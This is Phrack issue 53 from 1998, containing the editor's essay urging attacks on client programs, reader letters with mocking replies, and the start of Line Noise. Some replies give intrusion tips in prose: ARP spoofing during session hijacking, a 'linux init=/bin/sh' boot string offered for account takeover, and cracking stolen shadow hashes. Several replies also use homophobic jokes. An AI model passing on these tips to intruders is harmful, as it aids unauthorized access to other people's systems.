---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 01 of 15

-------------------------[  P H R A C K     5 3     I N D E X

--------[  Rumble in the Mumble


More than 6 months have passed since our last offering. My most humble,
sincere and heartfelt apologies. At long last, here we are. Better late
than never, that's what I always say. Unless of course, the late version
sucks, then I just like to disavow it entirely.

Well, here we go again. Another Phrack issue to glorify behavior which would
otherwise be classified as sociopathic or frankly psychotic (according to
Mich Kabay). More of what you want, more of what you need. Technical
articles on fanatically enticing topics, lines and lines of glorious source,
another gut-busting installment of Loopback, and of course, the News.
Mammas, don't let your babies grow up to be hackers. Or hookers for that
matter.

Alright. Let's get down to business. Let's talk remote attack paradigms.

Remote attack paradigms can fall into one of two types, based on the
standard client/server communication paradigm (we are glossing over any
extensions to the model like client to client or server to server stuff).
The two attack types are client to server (server-centric) and server to
client (client-centric). Server-centric attacks are well known, understood
and documented. Client-centric attacks are an area that is often
overlooked, but is definitely fertile ground for exploitation. Below we
look at both.


----[  Server-Centricity

Historically, the vast majority of remote attacks have been server-centric.
Server-centric, in this scope, refers to attacks that target server (or
daemon) programs. A common (and frequently recurring) example is sendmail.
The attack targets a server (the sendmail daemon) and approximates a client
(the exploit program). There are several reasons why this has been the
trend:

    - Server programs typically run with elevated privileges.

    Server programs usually require certain system resources or access to
    special files that necessitate privilege elevation (of course we know
    this doesn't have to be the case; have a look at POSIX 6). A successful
    compromise could very well mean access to the target system at that
    (higher) privilege level.

    - Discretion is the attacker's whim.

    The client/server message paradigm specifies that a server provides a
    service that a client may request. Servers exist to process clientele
    requests. As per this model, the attacker (client) makes a request
    (attack) to any server offering the service and may do so at any point.

    - Client codebase is usually simple.

    Dumb client, smart server. The impact of this is two-fold. The fact
    that server code tends to be more complex means that it is tougher to
    audit from a security standpoint. The fact that client code is
    typically smaller and less complex means that exploitation code
    development time is reduced.

    - Code reuse in exploitation programs.

    Client-based exploitation code bases are often quite similar. Code such
    as packet generators and buffer overflow eggs are often reused. This
    further cuts down on development time and also reduces required
    sophistication on the part of the exploit writer.

All of these make server-centric attacks enticing. The ability to
selectively choose a program to attack running with elevated privileges and
quickly write up exploit code for it is a powerful combination. It is easy
to see why this paradigm has perpetuated itself so successfully. However,
up until recently it seems another potentially lucrative area of
exploitation has gone all but overlooked.


----[  Client-Centricity

An often neglected area of exploitation is the exact reverse of the above:
client-centricity. Client-centric attacks target client programs (duh).
The types of programs in this category include: web browsers (which have
seen more than their share of vulnerabilities), remote access programs, DNS
resolvers and IRC clients (to name a few). The benefits of this attack
model are as follows:

    - Automated (non-discretionary) attacks.

    We know that, under the previous paradigm, the attacker has complete
    autonomy over who s/he attacks. The benefit there is obvious. However,
    non-discretionary attacking implies that the attacker doesn't even have
    to be around when the attack takes place. The attacker can set up the
    server containing the exploit and actually go do something useful (tm).

    - Wide dispersal.

    With client-centric attacks you can gain a wider audience. If a server
    contains a popular service, people from all over will seek it out.
    Popular websites are constantly bombarded with clientele. Another
    consideration: server programs often run in filtered environments. It
    may not be possible for an attacker to connect to a server. This is
    rarely the case in client-centric attacks.

    - Client codebase not developed with security in mind.

    If you think server code is bad, you should see some client code.
    Memory leaks and stack overruns are all too common.

    - Largely an untapped resource.

    There are so many wonderful holes waiting to be discovered. Judging by
    how successful people have been in finding and exploiting holes in
    server code, it stands to reason that the same success can be had in
    client code. In fact, if you take into account the fact that the
    codebase is largely unaudited from a security perspective, the yields
    should be high.

For all the above reasons, people wanting to find security holes should
definitely be looking at client programs. Now go break telnet.

Enjoy the magazine. It is by and for the hacking community. Period.
-- Editor in Chief ----------------[ route
-- Phrack World News --------------[ disorder
-- Phrack Publicity ---------------[ dangergirl
-- Phrack Librarian ---------------[ loadammo
-- Soother of Typographical Chaos -[ snocrash
-- Hi! I'm an idiot! --------------[ Carolyn P. Meinel
-- The Justice-less Files ---------[ Kevin D. Mitnick (www.kevinmitnick.com)
-------- Elite --------------------> Solar Designer
-- More money than God ------------[ The former SNI
-- Tom P. and Tim N. --------------[ Cool as ice, hot as lava.
-- Official Phrack Song -----------[ KMFDM/Megalomaniac
-- Official Phrack Tattoo artist --[ C. Nalla Smith
-- Shout Outs and Thank Yous ------[ haskell, mudge, loadammo, nihilis, daveg,
-----------------------------------| halflife, snocrash, apk, solar designer,
-----------------------------------| kore, alhambra, nihil, sluggo, Datastorm,
-----------------------------------| aleph1, drwho, silitek

Phrack Magazine V. 8, #53, xx xx, 1998. ISSN 1068-1035

Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editor in chief. Phrack Magazine is made available quarterly to the public,
free of charge. Go nuts people.
Contact Phrack Magazine
-----------------------

Submissions:        phrackedit@phrack.com
Commentary:         loopback@phrack.com
Editor in Chief:    route@phrack.com
Publicist:          dangergrl@phrack.com
Phrack World News:  disorder@phrack.com

Submissions to the above email address may be encrypted with the following
key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
=1iyt
-----END PGP PUBLIC KEY BLOCK-----

As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out
plaintext. You certainly can subscribe in plaintext.

phrack:~# head -20 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of the
 *  editors and contributors, truthful and accurate. When possible, all facts
 *  are checked, all code is compiled. However, we are not omniscient (hell,
 *  we don't even get paid). It is entirely possible something contained
 *  within this publication is incorrect in some way. If this is the case,
 *  please drop us some email so that we can correct it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
 *  entirely stupid (or illegal) things people may do with the information
 *  contained here-in. Phrack is a compendium of knowledge, wisdom, wit, and
 *  sass. We neither advocate, condone nor participate in any sort of illicit
 *  behavior. But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in the
 *  articles of Phrack Magazine are intellectual property of their authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */


-------------------------[  T A B L E   O F   C O N T E N T S

  1 Introduction                                    Phrack Staff      11K
  2 Phrack Loopback                                 Phrack Staff      33K
  3 Line Noise                                      various           51K
  4 Phrack Prophile on Glyph                        Phrack Staff      18K
  5 An Overview of Internet Routing                 krnl              50K
  6 T/TCP Vulnerabilities                           route             17K
  7 A Stealthy Windows Keylogger                    markj8            25K
  8 Linux Trusted Path Execution redux              K. Baranowski     23K
  9 Hacking in Forth                                mudge             15K
 10 Interface Promiscuity Obscurity                 apk               24K
 11 Watcher, NIDS for the masses                    hacklab           32K
 12 The Crumbling Tunnel                            Aleph1            52K
 13 Port Scan Detection Tools                       Solar Designer    25K
 14 Phrack World News                               Disorder          95K
 15 extract.c                                       Phrack Staff      11K
                                                                     482K

-----------------------------------------------------------------------------

    " The advent of information availability and a rise in the number of
      people for whom the net has always been 'the norm' is producing a
      class of users who cannot think for themselves. As reliance upon
      scripted attacks increases, the number of people who personally
      possess technical knowledge decreases. "

-----------------------------------------------------------------------------

----[  EOF


---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 02 of 15

-------------------------[  P H R A C K     53     L O O P B A C K

--------[  Phrack Staff


[ Ed. note: The letters are perhaps edited for format, but generally not for
  grammar and/or spelling. I try not to correct the vernacular, as it often
  adds a colorful perspective to the letter in question. ]


0x1>--------------------------------------------------------------------------

[ P52-02@0xd: ... Something you've mailed to a whiley bunch... ]

I couldn't help but notice your use of "whiley" rather than the more common
English word "wily" in the above-quoted paragraph. In the future, take the
time to grammar and spell check your replies to minimize the emotional
damage you are bound to suffer.

--Bob Stratton

[ WHOA! My bad.
  Strat has caught me with my proverbial pants around my proverbial ankles.
  Further evidence towards the 'me-not-being-omniscient' argument (although
  I still believe this to be conjecture). ]

P.S. Thanks for the sensible code-formatting discussion. Your style sounds a
lot like that which kept me sane back when I earned my living writing code.
The enlightened person's answer, of course, is to use an Emacs minor mode,
and to let the editor do the work while one types. Emacs is also the answer
to the Windoze 95 junkie looking for something with which to read Phrack.
Works for me.

[ Amen. Except for the emacs part. pico with regexp or vim 5.0 with syntax
  highlighting is the way to go. ]


0x2>--------------------------------------------------------------------------

[ P52-09: On the Morality of Phreaking ]

Dear Phrack,

I am not a hacker nor a hacker wannabe, so I had only the most passing
acquaintance with your publication. However, today by chance I came across
this article in your January 26 issue. I am impressed. I did my MA in
philosophy, and I was quite nonplussed to see such a lucid and philosophical
point of view in what is, to my understanding, a very specialized
publication not typically devoted to philosophy. Though my areas of interest
were mainly Nietzsche and Deleuze, I found your summary of both Mill and
Kant to be accurate and well-applied. Kudos, you obviously have some very
intelligent people on staff, whose talents are not limited to your own area
of expertise.

Yours respectfully,
Sean Saraq
Toronto

[ High praise indeed! Thank you for the compliments. It's good to see we're
  read in communities other than that of our target demographic. ]


0x3>--------------------------------------------------------------------------

I can't believe you included article 12 in Phrack 50. Is Phrack really
getting so sad? Have you really got nothing better to publish than
regurgitated crypto babble?

[ Despite what you may think, we are not sad. The phrack compound is imbued
  with much conviviality and festivity. Why, every Friday is `punch a mime
  day`. We hire a mime to come down to the office and we all take turns
  punching him in the face. ]

Cheers,

Chris (XORed that's Fghyud)

[ That's not a very good XOR implementation you have there. It appears an
  extraneous character has been inserted. Check your pad or the stream
  cipher. Or perhaps check your other regurgitated crypto babble for more
  info. ]


0x4>--------------------------------------------------------------------------

For those readers interested in "Piercing Firewalls" (Phrack Issue 52) take
a look at datapipe.c available at www.rootshell.com. I can't think of any
way to make it work with X, like tunnel/portal, but it works fine with
telnet and nothing needs to be running outside the firewall.

ziro antagonist

[ Noted. ]


0x5>--------------------------------------------------------------------------

Okay, enough nagging about the Milla pics! The one thing everyone reading
Phrack wants to know is:

When will you publish nude pictures of dangergrl ???

[ When your mom gives them back. ]

Yours Sincerely,
-anonymous.

(i get kicked from #hack enuf as it is already :)

[ What a surprise. ]


0x6>--------------------------------------------------------------------------

While the Juggernaut program is interesting, I've found that its model for
session stealing is a tad limited. There are two issues, one of which I've
dealt with. First issue is the one packet read, one packet written paradigm.
It really should allow separate threads for read/write to avoid getting
easily out of synch. This I've not dealt with, but it is understandable
given the second, the ACK storms it creates.

[ Juggernaut 1.x is very primitive in many ways. Juggernaut++, the next
  generation juggernaut, has been mostly redesigned from the ground up with
  a 90% new code base.
  It has many things the previous versions lacked, including: a much better
  interface, threading for concurrency, portability, efficiency mods, and
  many bugfixes. ]

The ACK storms can be avoided with an ARP attack (or possibly an ICMP
redirect). Send an ARP message to the source of the connection you're
stealing (an ARP reply) which tells it that the ethernet address of the
machine it's talking to (the destination machine, which you want to talk to
instead) is something "off in space" like 2:3:4:5:6:7 instead of the real
address. This needs to be done fairly often, should be started immediately
before you start your hijack attack.

[ Indeed. As long as the host will accept and cache unsolicited ARP
  responses, this will work. ]

The result is that the machine you are intercepting becomes unable to talk
to the destination and won't desynch the session, and traffic goes to
practically nothing. After you stop, the ARP table will shortly expire and
be updated with correct information, so the attack will either appear as a
network glitch, or you'll get alerted (NT will alert) that an IP address
conflict exists (but tell nothing about what the conflict is with).
Moreover, an ARP reply will escape the notice of many network monitoring
programs.

[ Something like this has in fact been implemented in juggernaut++... And,
  just to answer the burning question I get asked so often, NO, J++ is NOT
  publicly available. ]

I have sent the code to the original author of Juggernaut (being inclined
to share knowledge) and wanted to alert you.

[ The original author of juggernaut and I are pretty close. I'll be sure to
  check with him. ]


0x7>--------------------------------------------------------------------------

Hi! My name is StiN.

[ Mine's route. ]

I'm from Russia.

[ I'm from the U.S. ]

Sorry for my bad English.

[ Sorry for my bad russian, comrade. ]

I Have a friend His name is Armany.

[ I have a friend named Gilgamesh. ]

Where do you live?

[ I live in a small one bedroom apartment with four cats. ]

How old are you?

[ 19. ]

What's yore name?

[ We already went over this. ]

What's yore Hobby?

[ Volunteering for free medical tests of any variety. ]

Do you knew Russia?

[ I KNEW RUSSIA BACK IN THE GOOD OLE' DAYS! Back before the collapse. ]

Good Bay.

[ Bad Bay: Bay of Pigs. Good bay: Bay of jello. ]


0x8>--------------------------------------------------------------------------

Hi, I'm Omar.

I'm a fan of your magazine; I've been following it since Phrack 48. I'm not
a hacker, phreaker, or anything of the sort; I'm more a fan of the damned
machines. Very good articles; thanks for the LINUX stuff (it was very useful
to me). Good luck and keep it up.

Greetings from Uruguay, South America.

[ Yo quiero Taco Bell. ]


0x9>--------------------------------------------------------------------------

hi,

where can i find the source code for the legendary internet worm by morris
(1988) ?

thanx (i hope u dudez can help me :( )

[ ftp://idea.sec.dsi.unimi.it/pub/crypt/code/worm_src.tar.gz ]


0xa>--------------------------------------------------------------------------

My friends were going to a basketball game at their gay school (Grades

[ Wow, they have gay schools now? Do they videotape you jerking off and
  looking completely gay and stupid? (http://www.leisuretown.com) ]

pre-school through 8th grade). They were wearing their wallet chains, not
causing any harm with them. (It was an after school activity) the

[ As opposed to those people who have the wallet-chain/morning-stars. They
  are the ones who cause all that wallet-chain inflicted harm. ]

teachers made them take them off. My friend, Krazy K, asked if he could

[ Krazy K? Any relation to Daft D? ]

take off the chain and keep the wallet, but they made him give them the
whole thing. He thought it was funny, though, especially since he had
condomes in it (It is a "christian" school). Not that he was going to

[ Condomes! The condom that's a tent! ]

use them.
They of course being the nosy bastards that they are, rummaged around in it
to their liking and found them. (We know because they talked to him about
it.

[ Good detective work. ]

He told them it was a joke he was going to do to his friend. "I was going
to put it in his locker" He said.)

[ Now *that's* good humor. ]

I was wondering about the legality of this whole thing. Is it legal

[ Perhaps you should wonder about the stupidity of the whole thing first,
  then work your way towards relevance, and then back to stupidity again. ]

to take someone's wallet and chain (Which I consider personal property)
when it is an after school activity and then look through it? They gave

[ *shrug* Sure is fun though, isn't it? Actually, I don't know the laws and
  regulations of gay schools. It just might be allowed. ]

him no alternative (but to go home, and, "Oh by the way, you can't use the
phone"). Then to search through the wallet without permission of the owner?
I am asking because, I would like to get them in trouble, In retaliation to
the many times I've been screwed there (I go to high

[ Been screwed at the gay school? Hmm. Did you have any condomes? ]

school now, thank God). If you could tell me, or know of someone who knows,
then that would help us.

Thanks,
Abs0lute Zer0

[ You can say that again. ]


0xb>--------------------------------------------------------------------------

Dear Editor,

I would like to take a chance to give my most sincere thanks for
resurrecting my uttermost respect to the humanity (so often shattered by
politicians and other freaks) by providing me a unique opportunity to
immerse myself into the deep wisdom and magic of written word found in the
Line Noise section. This is truly the place where one can look for (with a
sense of deep confidence) a genuine proof that every person is a genius on
the inside.

[ Well thank you very much. Although I think you are referring to
  loopback. ]

Driven by this wonderful feeling of replenished hope and respect, I'd like
to answer a cry for help from a young but talented Hacker Demonhawk, who
expressed a wish to "blow shit up!!". I used to be a chemist, and I would

[ Ummm... ]

like to share, in the spirit of the magazine, my knowledge and provide easy,
quick instructions for young fighting souls that would assist them in the
aforementioned noble cause. In other words, how to build a bomb.

[ Whoops. You just lost me there. ]

{ rest of message truncated due to overwhelming levels of inanity ... }


0xc>--------------------------------------------------------------------------

where would one go to get "private" hacker help?

[ In the back where they give the lapdances. ]


0xd>--------------------------------------------------------------------------

sorry to bother ya... i was hoping maybe you could give me some info. don't
take me for a complete idiot,

[ Uh oh. ]

i just don't know much about this kind of stuff. maybe u could get me
started... give a few tips???

[ Sure. Never kiss on the first date. Always pack an extra pair of socks AND
  underwear. Never put electricity in your mouth 'just to see what would
  happen'. Also, if you happen to find yourself in the position, always at
  least *ask* to give someone the reach-around; it's common courtesy. ]


0xe>--------------------------------------------------------------------------

Hello, My name is Robert I guess you could call me a beginner hacker I was
wondering if you could please help me out I need some hacking numbers and

[ Ok. 7, 9, 11, 43, and 834. ]

passwords just so I can play around on them and get good. Also if you have

[ Sure. Try `password`, `hacker12`, `pickle`, and `love`. ]

any files or anything that you think that would be helpful to me please
attach

[ Alright, /dev/random is a good one to start with. ]

or tell me where I can get them.
I just bought the book Secrets Of A Super Hacker By Knightmare is that any
good if there is any books I should get

[ Ah yes, the book of the truly desperate and depraved. As was said once
  before by Voyager, Knightmare's biggest hack was getting that book
  actually published. ]

please tell me or if you have any text please send. I am running windows 95

[ Can you put Windows 95 in your mouth? NO! Such is Mango! ]

Thanks For Ur Time
Robert


0xf>--------------------------------------------------------------------------

Dear Sir

I like you hacker people because you made life easy to a lot of people

[ Especially the makers of fine Bavarian shoe-horns. ]

I want to ask you an important question to me

When connecting to Internet, I found that some sites inform me with my ISP
IP# So if they're any possibility that any site can track me and identify
the following

1-what country I came from?

[ Well; if you're dialing up to your ISP, and connecting to 'sites' from
  there, that would be a one hop jump out to the world. And yes; they could
  find out what country you're coming from, unless you're dialed into a
  provider in another country. In which case; it might be a little more
  difficult. The other tipoff is when you scan in your birth certificate
  and put it up on your webpage along side your current address and a head
  shot. That's a 'no-no'. ]

2-what is my phone number?

[ Are you asking us if we know your number? Or if someone can find your
  number when you connect to their machine and they know your IP address?
  I'm confused, so I'll answer the question both ways.

  A-1: No. We don't know your number, and we don't want it. While we're at
  it. We don't want to make out with you either. Quit sending us the
  flowers. It's over this time once and for all.

  A-2: If you did something that would incite someone to try to find your
  phone number; odds are if it was an illegal action your ISP would gladly
  hand your information to the first law enforcement person who walked
  through the door. Or for that matter, anyone who asks nicely. ISPs aren't
  exactly known for being well guarded vaults of information. ]

Globally can any site by coordination with my ISP track me and catch me?

[ Ever hear of Kevin Mitnick? ]

Please provide me with a full answer quickly.

[ Do people not realize this is a quarterly magazine? Quick for us is 3
  months. If you've done something stupid and gotten busted; our sincerest
  apologies for being late. Next time we'll drop what we're doing and get
  right to it. ]


0x10>-------------------------------------------------------------------------

I am a Indiana University student currently studying Criminal Justice. I am
trying to gather data and find information concerning computer hacking and
governmental and/or corporate involvement. The twist that I am pursuing
concerns a rumor that I had heard. I was told that when some computer
hackers were caught, they were recruited by the government and/or
corporations to work in their security department. Usually where there is a
rumor, there is some truth to the matter, especially when concerning the
department of defense. I don't know if you could help me find information
concerning this issue. Any help would be greatly appreciated.

Respectfully,
Jason Sturgeon

[ Well... We at Phrack haven't heard anything about the DoD hiring
  'hackers', it's been our understanding that the government at least
  prefers straight laced guys with military background to handle their
  stuff. Although it's not out of the realms of possibility that they've
  hired 'hackers', if it's happened it's of rare occurrence, and those
  individuals who fit the title of 'hacker' probably don't conform to your
  definition of what a 'hacker' really is.. Corporations and The Government
  for the most part tend to shy away from 'hackers', if merely for the
  stigma of being a 'hacker'. But as a stereotype, hackers conjure up all
  sorts of bad mental images for respectable management types.
  We're sure it's happened in some capacity, but we have no witty anecdotes
  concerning it. ]


0x11>-------------------------------------------------------------------------

Hello there

I have heard there are some risks using callback modems. Can you give me
some more info on this, or info where to look

[ Risks of callback modems are fairly simple. The problems involved with
  them are a little bit more complex. We'll discuss both in an effort to
  best cover this subject.

  The overall fundamental flaw of callback modems is the idea that you
  could 'fake' a hang-up on your end, or play a dialtone in an effort to
  fool the modem into thinking it hung up. Then you wait for it to dial the
  number, and once it's done, 'ATA' your modem and pick up the carrier. We
  ourselves have tested this a couple times with moderate success, it's not
  100% accurate, and it also depends on the hardware on the remote side. If
  the call-back information is based on ANI, that could provide more
  problems, since the Phrack staff has heard the rumor that you can fake
  ANI with certain types of ISDN set-ups.

  There are two types of callback modem configurations, one being a program
  that acts as a frontend to the dialing mechanism, the other being
  hardware based. Such as, you dial in to the modem, the program asks you
  to authenticate yourself by some means, you do so; it hangs up and calls
  the number that's paired with your authentication information. This isn't
  so bad, but if anyone remembers back when certain BBSs had callback that
  you could enter, you could make them call arbitrary phone numbers by
  putting in a fake number if their door was misconfigured.

  As far as hardware based call-back, where you program the passwords and
  numbers into the modem and it deals with the whole transaction,
  introduces a scalability issue as well as the fact that the modem has no
  means to log on its own, etc.. etc.. etc.

  If any readers wish to write an article based on this subject you are
  urged to write it and send it in. It'd be nice to see some more solid
  information on this subject. As well; if any companies wish to send us
  modems, we urge you to send us some modems so we can put them up against
  a battery of hacker tested and hacker approved tests. ]


0x12>-------------------------------------------------------------------------

I would like to know about cellular phones....how to find out secret pin,
how to listen to calls etc....

[ I would like to know more about marshmallows. How they're planted, the
  way they're picked in the spring time as they blossom from the little
  tiny buds you get in 'Swiss Miss Hot Cocoa', to the fat chewy vessels of
  taste and excitement that they are at full maturity. I would like to find
  out the secrets of gravity, as well as a good solid reason why the
  universe keeps 'expanding' -- without any of that "just because" rhetoric
  that seems to dominate the subject. ]

If You need the cellular make I'll be obliged to give it to you....

[ Wow. You'll give us your phone just so we can look at it? Send us your
  home address and we'll send you a S.A.S.E to mail it back to us in. ]

Thanks.
Anthony.

[ No. Thank _you_ for your generosity Anthony! ]


0x13>-------------------------------------------------------------------------

Hiya,

Not wishing to sound like a playboy forum article but I have read phrack for

[ Already my interest is waning... ]

quite a while and have only seen cause to write now.

I commend you on your editorial on C programming style. The sooner we get
out

[ And I commend you on your commendation. +100 points. ]

there and club to death those people that use single space indentation the
better.

I do however have three main points to disagree with you on.

1. Write as many comments as you can. You may need to remember what it was
   you were coding AFTER copious amounts of recreational drugs.

[ Nah. You don't want to get out of hand with the commenting. You end up
  commenting needlessly and redundancy abounds. And if you can't read your
  own code, kill yourself.
  -100 points. ]

2. Put your own variables with uppercase first letters (to distinguish them
   from sys vars)

[ `sys vars`? What like argc, argv or errno? This is a ridiculous
  suggestion. It makes your code ugly and harder to parse. I award you no
  points. ]

3. In reference to your comment "In the grand scheme of things, none are
   really any more correct than any others, except mine." It must be said
   that this is completely wrong. The only point that counts is in fact
   mine.

[ Not when it's in my magazine. With a final score of 0, you lose. ]

Regards,
andrewm at quicknet dot com dot au

[ Cute. ]


0x14>-------------------------------------------------------------------------

Dear Guys,

First off, I'd like to say that I am ever more impressed with the quality of
each successive issue of Phrack.

[ Danke. ]

The reason for this mail it to respond to the request made by N0_eCH0 in
Ireland in issue 52. Myself and a few friends are happy to help this guy out
if we can. I'm afraid that we're no great sources of knowledge, but are
willing to have a crack at most things.

Anyway, if you can pass this on, as there was no e-mail address for N0_eCH0,
I'd be much obliged.

Keep up the excellent work, I look forward to issue 53 !

ben_w@netcom.co.uk

[ There you go. ]


0x15>-------------------------------------------------------------------------

To whom it may concern:

I was wondering how I can read someone's dir and take over their account
the kernel is 2.0.0. How could I hack into the system without having a
passwd!!

[ I assume you mean Linux. `LILO: linux init=/bin/sh`. Oh, and you need
  console access. Good luck. ]

Thanx!
Tag


0x16>-------------------------------------------------------------------------

[ P52-19@0x2: Statement of Louis J. Freeh, Director F.B.I... ]

Hello,

I would like to say that the article, published as P52-19 is without a
doubt one of the most frightening threats to our freedom that man has ever
seen. the article is:

"The Impact of Encryption on Public Safety Statement of Louis J. Freeh,
Director Federal Bureau of Investigation"

This article basically states that Americans should have no personal
communication rights whatsoever. The Director of the FBI practically states
that strong encryption should be banned from the public, because he wants
law enforcement officers to be able to read all of our mail. He says that
this would be for reasons of terrorists and criminals, but fails to state
that the security of the average American would be compromised. Due to his
proposal that you would have to forfeit your key to government officials,
and that these keys would only be used "for the immediate decryption of
criminal-related encrypted communications or electronic information.". Or
maybe this way the government can just intercept all of your
communications.

My main objection to this is the irrelevancy that this would have to the
general public. According to US law, the US Postal Service is the ultimate
form of private security. The average American should be able to send a
letter to anywhere in the world, and it should be completely safe. And what
more can you send with encrypted email? A program, but you can do that with
a disk in a letter. So what's stopping these terrorists from hopping on down
to the Post Office?

Another problem with this proposal is that encrypted information is more
used to protect your information from other parties than the government. I
can guarantee that the average Joe living down the street is encrypting his
love letter to his mistress Jane so that his wife doesn't see it, not so
that some lazy, fat, government "official" doesn't see it. Most people use
this technology for much more practical usage than the deception of the
government. We use it because of the millions of people on the Net, and
perhaps we don't want those millions to see every little thing about our
personal lives.

And finally, why should the government be able to restrict our right to
gather peacefully? With technology moving so fast, i think that it is
reasonable to assume that the Internet is a gathering place? We have all of
the means of normal communication and more. Chat rooms, email, and programs
like Mirabilis's ICQ allow us to communicate on a whole new level.

In light of all of this, i hope you share my opinions now about the loss of
freedom that this would represent.

Thank you.


0x17>-------------------------------------------------------------------------

Hi, I am a little sysadm on a little Linux-Server on the net.

[ I have little interest in those details. ]

I am searching for documents about System Security under Linux/UNIX just to
be up-to-date :) Thank you for your help.

[ http://www.redhat.com/linux-info/security/linux-security/ ]

And btw...I have parts of the /etc/shadow file from my ISP...what can I do
with this? Can I just run crack over it?

[ Well now, that all depends on what parts you have, doesn't it...? If you
  have the encrypted hashes, then you're in business. ]

And, btw: Not all germans hate americans...I am german and I don't hate
americans... and my generation has nothing to do with the WWII...

[ Oh, I think you do. I am relatively certain that, somewhere deep down,
  you dislike us. You couldn't take a shellacking like you did in WWII (not
  to mention spaetzle) and *not* feel some sort of resentment. It's ok.
  Embrace your malevolent feelings. Hug them. C'mon! Once you've done that,
  you can dissolve them. I admonish you to TURN THAT FROWN UPSIDE-DOWN!
  Cmon! Bodyslam yourself into gayness! ]

-firefox01


0x18>-------------------------------------------------------------------------

Hello there, good to talk to you.

[ Likewise. ]

I am just this "Thinker" with this thought why don't we the Hackers and you
the one of the major contributing Hacker commune (2600,Phrack,ect) make a
Full Strong "live" Crypto network for the Hacker and by the Hacker.
[ I have a thought. Get a speak n' spell. ] I can't belive I am sending this from hotmail bought out by microshit blah blah no this thing must be really insecure. [ Well, maybe it just needs love and attention and for someone to say nice things to it. ] Well I have a whole line of ideas and no one ever listens to me netscape ect... but if your intrested e-mail me back and I'll give you my POP adress. The benifit of this system is 1) we can piss off the FBI [ Yes, let's piss off the F.B.I. And, while we're at it, let's piss off the IRS and let's annoy the CIA.. We can poke fun at the retarded wrestlers association. And lastly, let's aggravate an enraged bull. ] and 2) final we hackers can have a place to loyter and idile , lurk at [ loyter and idile? Hey, aren't they those two Jewish film critics? I love them! ] where we can say what ever the Hell such as Full deatails on how to enter a sys,ect...of corse we will have to screen ppl for trust ect... [ And screen them for stupidity. ] But I reall belive we can werk this. If you want to here the rest of my ground shaking ideas just ask, or full deatials on the Crypto.net . [ Pass. ] 0x19>------------------------------------------------------------------------- First off, I'd like to say that I love the mag...but you really get some nutjobs that post to it..(myself included) I'm not an elite hacker, a unix guru or anything like that(duh), but I am amazed at the effort you put into Phrack...anyways, keep up the good work [ Thanks, nutjob. ] 0x1a>------------------------------------------------------------------------- Hello, Who was the first hacker in history? [ God. ] thanks for your time, greetings, Max 0x1b>------------------------------------------------------------------------- Hi. i'm a Swedish kid and i just wonders [ Now the Swedes I like. Beautiful women. Amazing accents. I *think* they like me. Although this one particularly hot Swedish girl I know doesn't seem to like me much. 
I think maybe it's because I try too hard around her. She'll come around and I'll be like bouncing off the walls trying to impress her.. I remember one time I got so excited I almost set sail for gaiety. I know. I know. I should "just relax" and everything will fall into place. I dunno tho. She's so pretty. And ahm just so awkward... ] if you might know a good haking, freaking and craking site. I've checked everywhere but i have not any. [ Huh? ] 0x1c>------------------------------------------------------------------------- Hey sup, I'm makin an essay site similar to Slackers Inc. but with more essays. The only problem is I need sponsors to get my page up, can you pay me a small fee monthly for displayin a banner for your site. I know almost [ O.k. Sure, how does nothing/month sound? ] everybody knows about Phrack Magazine but I heard you do some sponsoring, E- mail me back if you are interested. [ Yah, we are *so* reknown for our advertising budget. And now I'd like to make Phrack reknown for sponsoring a gay fucking highschool/college paper stealing webpage. Sure. I'll get right on that after we do our 'kick a baby harp seal campaign'. ] 0x1d>------------------------------------------------------------------------- You need to write an Interactive tutorial to simulate hacking into a private college or a company. You should make it realistic and hard to access. [ Someone already did. They're called *.edu and *.com. Although sometimes they're not too realistic. ] 0x1e>------------------------------------------------------------------------- [ P52-14: International Crime Syndicate Association ] Dorathea Demming, You remark that the ICSA doesn't guarantee their certification against attack. "In plain English, they are saying that if you get sued, you are on your own." Do you know of any security company, consultant, or consortia that will commit to helping a customer legally if they've been attacked? 
Stu

0x1f>-------------------------------------------------------------------------

In skateboarding you are a "poseur" if you don't know shit. In the computers culture you are a "lamer" if you don't know shit. The term that bugs me is "elite" or "eleet" or "3l33t3". Are you elite? I just don't like the term. I really like the term "HI-FI", as in high-fidelity, or high-fidelity stereos. An outdated term that originally meant "I've got the best gear". But now it just means "late 70's marketing scheme". Are you hi-fi? It has a ring to it. You may be elite right now but in time you'll be hi-fi.

------------------------------------------------------------------------------

----[ EOF

---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 03 of 15

-------------------------[ P H R A C K 5 3 L I N E N O I S E

--------[ Various

0x1>-------------------------------------------------------------------------

On not being a moron in public - nihilis

(In response to why cantor kick-banned someone off of #Phrack without warning: you were an idiot near me i hate that)

I wouldn't think normally that this is an article which needs to be written. But as experience has shown, it may very well be.

Several months ago I was on the IRC EFnet's channel #phrack and one of the users spouted a URL for a web page he and his cohorts had hacked. On it he had kindly sent salutations to everyone he knew and to Phrack. We, the other occupants of the channel, all admitted that none of us spoke authoritatively on the magazine's behalf, but that we were confident that none of the editorial staff would appreciate being implicated in a felony by association. The user didn't seem to understand.

The next day, when the user was asked to join some of the authorities at the local station-house for a short interview, I'm sure he wet his pants. The line of questioning was short: it merely established that he had not been the culprit in further attacks on the same host. The police released him uncharged.

